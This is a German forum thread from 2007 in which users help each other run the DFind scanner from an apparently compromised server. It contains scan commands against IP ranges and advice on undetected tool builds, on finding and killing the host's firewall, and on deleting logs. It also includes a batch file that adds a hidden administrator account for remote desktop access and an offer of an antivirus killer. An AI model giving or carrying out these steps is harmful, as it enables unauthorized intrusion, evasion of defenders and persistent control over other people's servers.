Erstellt DFind geleich eine .txt

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Kaptain27, 24. Januar 2007 .

Schlagworte:
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 24. Januar 2007
    Hey Leutz

    hab mal ne Frage erstellt DFind gleich nach start des Prozesses eine Textdatei oder erst beim ersten Found???

    Mfg Kaptain27
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    die txt wird schon beim scan parameter erstellt.
     
  4. #3 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    yo wie hardcore schon gesagt hat .. nachdem der prozess gestart wurde wird gleich eine txt erstellt wo der befehl steht
     
  5. #4 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    Arrg was mach ich denn falsch?!?!


    Will vom Stro aus scannen benutze FlashFXP und starte den Prozess mit:

    site exec hidden.exe DFind.exe -ftp 211.46.2.1 230.47.1.1
     
  6. #5 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    was willst du den scannen ? pubs ?
     
  7. #6 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    Den Command gibt es bei dfind nicht nur bei scan*.exe
     
  8. #7 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    Ja Pubs aber auch wenn ich

    site exec hidden.exe DFind.exe -p 1433 211.46.2.1 230.47.1.1

    eingebe kommt keine txt
     
  9. #8 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    Vllt. nen antivir prog oder dergleichen, dass das starten von dfind unterbindet.
    Musst dir mal die prozesse angucken, die am laufen sind.
     
  10. #9 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    Wie?
     
  11. #10 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    leute man man dann macht es ud (undetected)!
    ps: so funzt das:

    site exec hiderun.exe dfind.exe -p PORT x.x.x.x x.x.x.x

    Pub Port= 21
    Mssql Port= 1433
    Pma Port= 80

    wichtig ist es eine ud dfind sowie hiederun zu haben, dann sollte es immer funktionieren
     
  12. #11 24. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    Antivir denke ich nicht.
    Bei nem Antivir würde die exe veschwinden bzw nicht up zu loaden sein.
    Entweder hängt nen Router vor .. der Port 1433 blockt oder ne Software Firewall....

    Wenn du schon ausführen kannst estell dir doch nen remote desctop account und machs alles unter der Windowsoberfläche... da siehste den fehler wenigstens...
     
  13. #12 25. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    vergiss mal das nicht brauchbare hidden.exe und start dfind direkt.
     
  14. #13 25. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    Hab es jetzt mal ohe Hidde.exe probiert aber das funzt auch net. Hab kp woran das liegen kann
     
  15. #14 25. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    dann wird dfind wohl von ner fw davon abgehalten, nach draussen zu gehen. versuchs per GUI! dort solltest mehr glück haben.
     
  16. #15 25. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    versuchs per GUI! dort solltest mehr glück haben.


    Was heißt GUI bzw was ist das hab noch net all zu viel Erfahrungen damit.

    Aber schonmal ein BIG THX an alle die bis hetzt geholfen haben BW ist raus.
     
  17. #16 25. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    gui = graphical user interface

    ich mein damit sowas wie remote desktop oder vnc. hau mal ne batch mit "net start > a.txt" als inhalt in nen beliebiges verzeichnis und führ die datei aus (site exec <batch>). dann in der neu erstellten a.txt nachschauen, was für ne fw läuft. diese kannst du u.U. sogar via ffxp beenden und brauchst den mehraufwand nicht zu betreiben.
     
  18. #17 25. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    Aso THX wieder etwas klüger aber in Angesicht das der Stro in der Schweiz steht wird mir das doch ein bisschen zu riskant. Da werd ich wohl mal nach einen neuen Stro suchen müssen:( :poop:...

    Naja nochmal besten Dank

    Mfg Kaptain27
     
  19. #18 25. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    Wenn dir das zu riskant ist, kannst du ihn mir gerne geben. ;)
    Einfach die logs löschen, nachdem du die fw gekillt hast, dann
    ist doch alles roger.^^
     
  20. #19 26. Januar 2007
    AW: Erstellt DFind geleich eine .txt

    mach ne batch datei da schreibste rein :
    ( ich glaub so war das mom *denk)

    "
    Code:
    net user USERNAME PASSWORT /add
    
    net localgroup Administratoren USERNAME /add
    ich glaub so war das... is lang her.. brichtigt mich wen ich falsch liege

    dan führ die aus und versuch dann per remote desktop ran zu kommen

    Zurnot musste noch die nötigen dienste dazu starten .. aber die laufen eistens.. kil die firewall mit den services gegebenenfalls auch noch ...
     
  21. #20 14. April 2007
    AW: Erstellt DFind geleich eine .txt

    Die laufenden Prozesse sieht du indem du

    site exec cmd /c tasklist>task.txt

    ausführst.

    Da kommt dann eine Datei Namens task.txt in der allt aktuellen Prozesse aufgelistet sind.
    Brauchst du einen AV Killer ?
     
  22. #21 14. April 2007
    AW: Erstellt DFind geleich eine .txt

    kommt drauf an, was du für ne version von dfind hast.. ;)
     

  23. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Erstellt DFind geleich
  1. Antworten:
    5
    Aufrufe:
    1.432
  2. Antworten:
    4
    Aufrufe:
    1.372
  3. Antworten:
    42
    Aufrufe:
    5.955
  4. Antworten:
    2
    Aufrufe:
    1.702
  5. Antworten:
    8
    Aufrufe:
    536